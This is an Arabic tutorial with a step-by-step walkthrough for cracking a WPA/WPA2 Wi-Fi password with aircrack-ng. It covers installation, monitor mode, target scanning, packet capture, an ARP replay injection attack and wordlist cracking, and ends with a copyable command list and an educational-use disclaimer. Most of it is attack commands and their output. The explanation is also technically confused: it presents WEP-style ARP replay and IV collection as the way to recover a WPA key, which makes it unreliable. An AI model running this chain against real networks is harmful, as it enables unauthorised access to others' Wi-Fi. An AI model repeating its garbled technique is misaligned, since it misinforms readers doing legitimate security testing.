Aircrack-ng هو في الأساس مجموعة برامج شبكية تم تصميمها لتحقيق الأهداف التالية:
لاحظ أن البرنامج التعليمي الحالي ليس دليلاً شاملاً، بل يهدف إلى بناء بعض المهارات الأساسية لاختبار أمان شبكتك الخاصة والتعرف على المفاهيم.
يعتمد الهجوم الموضح أدناه على تقنية سلبية (هجوم إعادة تشغيل طلب ARP) ويركز على التوزيعات المستندة إلى دبيان بافتراض أن لديك بطاقة لاسلكية عاملة مع برامج تشغيل مصححة بالفعل للحقن.
يمكن تثبيت Aircrack-ng على نظام تشغيل يستند إلى دبيان عن طريق تجميع الكود المصدري (لمزيد من التفاصيل، يمكنك زيارة الموقع الرسمي).
يمكنك العثور أدناه على تعليمات لتثبيت المتطلبات الأساسية لبناء aircrack-ng لأنظمة التشغيل المستندة إلى Debian.
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
احصل على أحدث نسخة من aircrack-ng:
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
لبناء aircrack-ng، يتم استخدام نظام البناء Autotools. أولاً، ./configure
بتكوين المشروع للبناء بالخيارات المناسبة:
$ autoreconf -i
$ ./configure --with-experimental
بعد ذلك، قم بتجميع المشروع باستخدام أمر make
واستخدم هدف "التثبيت" من الأهداف الإضافية المذكورة أدناه لإكمال التثبيت.
make check
make integration
make install
make uninstall
الغرض من هذه الخطوة هو التأكد من أن بطاقتك تدعم الحقن بنجاح. بافتراض أن اسم الواجهة الخاصة بك هو "wlan0" (يمكنك استعادته بكتابة iwconfig
على الجهاز)، فاكتب الأمر التالي:
# aireplay-ng --test wlan0
يستجيب النظام:
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
هذا يؤكد أن بطاقتك يمكنها حقن الحزم.
أول شيء عليك فعله هو البحث عن هدف محتمل، وذلك بوضع بطاقتك اللاسلكية في وضع المراقبة باستخدام airmon-ng
. ومع ذلك، يوصى بشدة kill
كافة العمليات المتداخلة قبل استخدام مجموعة aircrack-ng.
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
بعد ذلك، من الممكن تمكين وضع الشاشة المستخدم لإنشاء واجهة أخرى (mon0):
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
ستلاحظ أنه تم وضع "wlan0" في وضع المراقبة بنجاح. ثم ابدأ airodump-ng
للبحث عن الشبكات:
# airodump-ng mon0
حدد موقع الشبكة اللاسلكية التي تريد اختراقها، ولاحظ BSSID والقناة الخاصة بها من الإخراج التالي:
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
لاحظ أن الجزء العلوي من المخرجات يسرد معلومات حول نقاط الوصول الموجودة في النطاق، بينما يسرد الجزء السفلي العملاء المتصلين بنقاط الوصول المقابلة.
افتح جلسة وحدة تحكم أخرى لالتقاط المتجهات الأولية التي تم إنشاؤها بواسطة الهدف وحفظ النتيجة في ملف:
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
حيث -c 10
هي قناة الشبكة اللاسلكية، --bssid 08:00:BF:E6:31:2E
هو عنوان MAC لـ AP، -w output-file
ملفات الإخراج التي ستحتوي على متجهات التهيئة، و mon0
هو اسم الواجهة.
يستجيب النظام:
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
بعد تنفيذ الأمر سيتم إنشاء ملفات مختلفة.
يعد هجوم إعادة تشغيل طلب ARP الكلاسيكي الطريقة الأكثر فعالية لإنشاء متجهات تهيئة جديدة، ويعمل بشكل موثوق للغاية. الغرض من هذه الخطوة هو بدء تشغيل aireplay-ng
في وضع يستمع لطلبات ARP ثم يعيد إدخالها مرة أخرى إلى نقطة الوصول. استمر في تشغيل airodump-ng
و aireplay-ng
، وافتح محطة طرفية أخرى وقم بتشغيل هجوم إعادة تشغيل طلب ARP:
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
يمكنك التحقق مما إذا تم حقن الحزم من خلال النظر إلى شاشة airodump-ng
.
عند هذه النقطة، يجب أن تكون قادرًا على الحصول على مفتاح WPA من متجهات التهيئة المجمعة في الخطوات السابقة. لتنفيذ هذا الهجوم، تحتاج إلى قائمة كلمات، وإذا لم تكن كلمة مرور الشبكة موجودة في ملف Word، فلن تتمكن من كسر كلمة المرور. لاحظ أن معظم أجهزة توجيه WPA/WPA2 تأتي مع كلمات مرور عشوائية قوية مكونة من 12 حرفًا والتي يتركها العديد من المستخدمين (عن حق) دون تغيير. إذا كنت تحاول اختراق إحدى كلمات المرور هذه، فإنني أوصي باستخدام قوائم كلمات المرور ذات طول WPA.
افتح جلسة وحدة تحكم أخرى واكتب:
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output * .cap
حيث يحدد -a2
وضع الهجوم لـ WPA/WPA2-PSK، ويشير -w wordlist.txt
إلى قائمة كلمات القاموس الخاص بك، ويحدد output*.cap
كافة ملفات الإخراج ذات الامتداد .cap
.
هذه هي نتيجة الهجوم الناجح:
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
يمكنك العثور أدناه على قائمة بجميع الأوامر اللازمة لاختراق شبكة WPA/WPA2.
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
هذا المشروع مرخص بموجب ترخيص MIT - راجع ملف الترخيص للحصول على التفاصيل.
تم إعداد هذا البرنامج التعليمي للأغراض التعليمية فقط، ولا أروج للممارسات الضارة ولن أكون مسؤولاً عن أي أنشطة غير قانونية.